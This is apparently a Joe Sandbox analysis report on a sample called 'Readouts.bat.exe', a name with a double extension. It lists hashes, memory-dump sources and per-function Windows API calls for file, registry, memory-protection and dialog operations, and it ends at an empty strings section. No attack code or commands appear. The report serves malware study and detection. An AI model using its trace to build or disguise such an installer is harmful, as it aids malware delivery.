Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E

Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
Instruction ID: bb989e29a52a93802ac21e82b74e9b17d97bb9506e6cfc7636de57e0f2ab50b5
Opcode Fuzzy Hash: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
Instruction Fuzzy Hash: B8E09271E14104AFD710DBA5AE0ACBEB7B8DB84318B20403BF201F50D1CA794E118E3E

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 0040611F Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675

Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8

Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4

Function 6FBF2997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6FBF405C,00000004,00000040,6FBF404C), ref: 6FBF29B5

Memory Dump Source

Source File: 00000000.00000002.2200727678.000000006FBF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBF0000, based on PE: true

Associated: 00000000.00000002.2200703347.000000006FBF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200746589.000000006FBF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200767970.000000006FBF5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fbf0000_Readouts.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5ad38eed4653a43c8cfe3e89e0e06cae8f254e3daebfc6ce748c2e0bbdbacd09
Instruction ID: 6e071f71f4c55b807d42468fbeca19206aabd61f93df9cf062075d0f83d5bc3e
Opcode Fuzzy Hash: 5ad38eed4653a43c8cfe3e89e0e06cae8f254e3daebfc6ce748c2e0bbdbacd09
Instruction Fuzzy Hash: 25F0C9B150BBC0EECB50CF7AF644B053BE0F74A324B01592AE1A8D7250E334406BCB16

Function 004060F1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,Call,?), ref: 00406115

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54

Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C

Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,0040405B), ref: 0040423E

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19

Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08

Non-executed Functions

Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C80
GetDlgItem.USER32(?,00000408), ref: 00404C8B
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
LoadBitmapW.USER32(0000006E), ref: 00404CE8
SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
DeleteObject.GDI32(00000000), ref: 00404D5E
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
GetWindowLongW.USER32(?,000000F0), ref: 00404E99
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
ShowWindow.USER32(?,00000005), ref: 00404EB8
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
ImageList_Destroy.COMCTL32(?), ref: 00405088
GlobalFree.KERNEL32(?), ref: 00405098
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
InvalidateRect.USER32(?,00000000,?), ref: 004051E9
ShowWindow.USER32(?,00000000), ref: 00405237
GetDlgItem.USER32(?,000003FE), ref: 00405242
ShowWindow.USER32(00000000), ref: 00405249

Strings

M, xrefs: 00404E12
N, xrefs: 00404EF3
, xrefs: 00405221

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58

Function 004046EC Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040473B
SetWindowTextW.USER32(00000000,?), ref: 00404765
SHBrowseForFolderW.SHELL32(?), ref: 00404816
CoTaskMemFree.OLE32(00000000), ref: 00404821
lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
lstrcatW.KERNEL32(?,Call), ref: 0040485F
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871

Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1

Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,?,004216B8,?,?,000003FB,?), ref: 00404934
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F

Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

